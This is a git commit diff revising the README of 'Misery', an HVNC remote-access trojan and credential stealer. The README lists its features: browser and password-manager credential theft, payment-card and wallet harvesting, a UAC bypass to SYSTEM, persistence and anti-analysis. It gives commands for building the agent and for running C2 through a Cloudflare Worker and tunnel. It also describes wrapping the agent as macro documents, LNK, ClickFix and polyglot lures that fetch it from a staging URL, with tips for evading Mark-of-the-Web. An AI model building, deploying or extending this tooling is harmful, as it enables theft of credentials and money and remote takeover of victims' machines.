readme: tagline, emoji bullets, de-dup features vs how-it-works, vt section, personal note, tightened wrappers prose, unslopped

This commit is contained in:
JYenn
2026-08-18 00:19:55 +01:00
parent c458ffd065
commit c5a859ba82
3 changed files with 47 additions and 60 deletions
+44 -60
View File
@@ -1,4 +1,4 @@
# Misery + HVNC
# Misery
<p align="center">
<img src="Misery.png" alt="Misery" width="420">
@@ -6,35 +6,40 @@
<em>a devoted sister of the Church of Malware</em>
</p>
An HVNC RAT and stealer, derived from the 2023-era Creal stealer and rebuilt for Chrome's App-Bound Encryption. Chrome 127+ moved credential decryption behind ABE, a COM service running as the browser user. The agent walks that COM object in-process via indirect syscalls, so nothing credential-shaped ever touches disk. ABE research is all [xaitax](https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption). Local testing and research only.
**A HVNC remote-access trojan and stealer rebuilt for the App-Bound Encryption era.**
Derived from the 2023-era Creal stealer. Since mid-2024 Chrome has locked credential decryption behind App-Bound Encryption (ABE), a COM service running as the browser user. The agent walks that COM object in-process via indirect syscalls, so decrypted credentials never touch disk. ABE research is all [xaitax](https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption). Local testing and research only.
## Demo
<p align="center">
<img src="demo.gif" alt="Misery demo" width="100%">
<img src="demo.gif" alt="Misery demo" width="1000">
</p>
## VirusTotal
<p align="center">
<img src="MiseryVT.png" alt="VirusTotal scan result" width="1000">
</p>
## Features
- **Hidden desktop** (`hvnc start`): GDI apps on a hidden desktop, streamed live
- **Interactive browser** (`hvnc launch chrome`): real Chromium with the victim's logins, driven over CDP
- **Ghosted browser** (`ghost <url>`): hidden Chrome/Edge session using the victim's cookies and logins
- **Credential harvesting**: Chrome, Edge, Brave, Opera, Opera GX, Firefox
- **App-session harvesting**: payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH keys, Wi-Fi passwords, wallet extension paths, Signal session listing
- **Encrypted C2 channel**: reverse TCP (default) or HTTPS beaconing through a CDN
- **Payload builder** (`setup.py`): msfvenom-style config, ECDH key handling, and `-p` delivery wrappers for `docm`, `xlsm`, `lnk`, `pdf`, `html`, `clickfix_html`, `iso`, `polyglot_exe_zip`, and `polyglot_html`
- **Keylogger and clipboard monitoring**
- **Persistence**: HKCU Run key and WMI event subscriptions
- **Elevation** (`elevate`): silent UAC bypass to High, then SYSTEM via SeDebug token theft
- **Anti-analysis**: user-mode environment checks, reflective injection
- 🖥️ **Hidden desktop** (`hvnc start` / `hvnc launch chrome`): GDI apps and a real Chromium on a hidden desktop, streamed live
- 🌐 **Ghosted browser** (`ghost <url>`): hidden Chrome/Edge session using the victim's cookies and logins
- 🔑 **Credential harvesting**: Chrome, Edge, Brave, Opera, Opera GX, Firefox
- 💳 **App-session harvesting**: payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH keys, Wi-Fi passwords, wallet extensions, Signal sessions, password managers (KeePass, KeePassXC, Bitwarden, 1Password, LastPass, Dashlane, NordPass), Windows Credential Manager, Keeper, Proton Pass, Enpass, RoboForm, Minecraft launcher accounts, Roblox cookies
- 🔐 **Encrypted C2 channel**: reverse TCP (default) or HTTPS beaconing through a CDN
- 📦 **Payload builder** (`setup.py`): msfvenom-style config, ECDH key handling, `-p` wrappers for 9 delivery formats
- ⌨️ **Keylogger and clipboard monitoring**
- 🪝 **Persistence**: user-registry Run key and WMI event subscriptions
- 🕵️ **Anti-analysis**: user-mode environment checks, reflective injection
## How it works
- **Channel**: the console holds the private half of an ECDH P-256 keypair in `.misery_key`; the agent only ever ships the public half. Every session derives a fresh AES-256-GCM key from the handshake, so no key material repeats across bots.
- **Stealing**: spawn a suspended Chrome or Edge, inject the payload DLL in-process, and walk the ABE COM object to decrypt the stored credentials. No disk write, and the browser never visibly opens.
- **HVNC**: `hvnc start` runs GDI apps on a hidden desktop and streams frames to the operator view. `ghost <url>` drives a real Chromium over CDP, logged into the victim's profiles; the browser is basically them.
- **Elevation**: relaunch as admin via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL process.
- **Delivery**: `setup.py -p` wraps the agent into 9 file formats; only the stage URL and agent filename are injected at build time.
- 🔐 **Channel**: the console holds the private half of an ECDH P-256 keypair in `.misery_key`; the agent only ever ships the public half. Every session derives a fresh AES-256-GCM key from the handshake, so no key material repeats across bots.
- 💉 **Stealing**: spawn a suspended Chrome or Edge, inject the payload DLL in-process, and walk the ABE COM object to decrypt the stored credentials. No disk write, and the browser never visibly opens.
- 🖥️ **HVNC**: GDI apps run on a hidden desktop and stream frames to the operator view. Ghosted sessions drive a real Chromium over the Chrome DevTools Protocol, logged into the victim's profiles; the browser is basically them.
- ⬆️ **Elevation**: relaunch as admin via a forged PEB (process environment block) and COM auto-elevation (CMSTPLUA/ICMLuaUtil), then SYSTEM through SeDebug token theft from a non-PPL process.
## Tested On
@@ -44,16 +49,6 @@ An HVNC RAT and stealer, derived from the 2023-era Creal stealer and rebuilt for
| Microsoft Edge | `151.0.4129.59` |
| Elevation chain | Windows 11 25H2 (build 26200) |
<p align="center">
<img src="MiseryOperatorView.png" alt="Misery operator view" width="1000">
</p>
## VirusTotal
<p align="center">
<img src="MiseryVT.png" alt="VirusTotal scan result" width="1000">
</p>
## Quick start
`setup.py` writes `src/config.h`, saves the console's ECDH key to `.misery_key`, and builds the project:
@@ -72,6 +67,19 @@ Run the console listener, then the agent:
Type `help` in the console for the full command list.
## CDN mode
Same console and commands, no public IP. The agent POSTs encrypted frames to a
Cloudflare Worker that relays through a Zero Trust Tunnel to the console.
```powershell
python setup.py -t https_cdn BEACON_URL=https://<you>.workers.dev/poll AUTH_SECRET=<secret> TUNNEL_HOST=c2.example.com
```
setup.py emits `deploy/worker.js` and `deploy/cloudflared-config.yml`. Deploy
the worker with `wrangler deploy deploy/worker.js`, fill the tunnel UUID into
the config, `cloudflared tunnel run <name>`.
## Payload wrappers
The builder (`setup.py -p <formats>`) packages the agent into delivery
@@ -95,34 +103,14 @@ python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -p docm,iso -o misery STAGE_UR
`-p all` builds every format. The macro, lnk, clickfix, and polyglot_exe_zip
formats fetch the agent from `STAGE_URL` when the target opens them; pdf, html,
iso, and polyglot_html carry the agent themselves. The macro files ship with
decoy content, and the lnk/pdf formats show a decoy document, so they read as
normal business documents instead of empty templates.
iso, and polyglot_html carry the agent themselves.
The docm/xlsm wrappers copy the Office-compiled base (`wrappers_bases/`), fill
decoy content, and inject per-build values — Word docvars in `word/settings.xml`,
Excel cfg-sheet cells in `xl/sharedStrings.xml` — so the pre-compiled VBA
assembles the download chain at open time without rewriting any macro stream.
They're compiled by Office itself because pyopenvba-style rebuilds leave the
auto-events unhooked (root-caused live 2026-08).
Delivery notes:
The lnk and polyglot_exe_zip fetch their decoy PDF from the same directory as
`STAGE_URL`, so host the generated `<out>.cmd` and `<out>.decoy.pdf` next to
the agent.
Delivery note: browsers tag downloaded files with the Mark-of-the-Web
(Zone.Identifier), which trips SmartScreen on macros and executables. Extract
a container with 7-Zip or WinRAR to drop the MOTW (Explorer itself
propagates it), so the `iso` wrapper or archiver extraction is the practical
route for the macro and exe formats; the pdf and html formats are fine to
serve straight from a browser.
The wrappers use these optional libs; a missing lib just skips the formats
that need it:
```powershell
pip install pylnk3 pycdlib pikepdf python-docx openpyxl
```
- The docm/xlsm bases are compiled by Office itself; pyopenvba-style rebuilds write source-only streams whose auto-events never hook (root-caused live 2026-08). Builds inject only the stage URL and agent filename, so no macro stream is ever rewritten.
- The lnk and polyglot_exe_zip fetch their decoy PDF from the same directory as `STAGE_URL`; host the generated `<out>.cmd` and `<out>.decoy.pdf` next to the agent.
- Downloaded files get the Mark-of-the-Web, which trips SmartScreen on macros and executables. Extract a container with 7-Zip or WinRAR to drop it. That's the route for macro and exe formats; pdf and html serve fine straight from a browser.
- Optional libs; a missing one just skips its formats: `pip install pylnk3 pycdlib pikepdf python-docx openpyxl`
The docm/xlsm bases live in `wrappers_bases/` and ship with the repo; rebuild
them in Office if you ever change the macro logic (see the wrapper docstring
@@ -134,7 +122,7 @@ notes), then commit the new base.
| --- | --- |
| `bot` | list bots; `bot <id>` targets one, `bot all` broadcasts |
| `steal` | run credential and session harvesting |
| `loot` | dump the last steal result JSON raw to the terminal |
| `loot` / `dump` | replay the last steal result as boxed terminal sections |
| `elevate [system]` | relaunch the agent as admin; `system` chains to SYSTEM |
| `hvnc start` / `hvnc stop` | start or stop the hidden desktop session |
| `hvnc launch [path]` | launch an app (default Chrome) on the hidden desktop |
@@ -183,10 +171,6 @@ A fresh checkout builds against `127.0.0.1:4444`. Run `setup.py` once so `.miser
- `wrappers_bases/`: Office-authored compiled macro bases used by the docm/xlsm wrappers
- `build/`: out-of-source build dir
Love all you killas. Stay sharp. ♱
If you save passwords in a browser, stop: use a password manager, keep work infra on dedicated logins, and disable sites saving data. Wipe cookies on exit.
## Licence
No licence granted. Research code for study only; not licensed for redistribution or commercial use.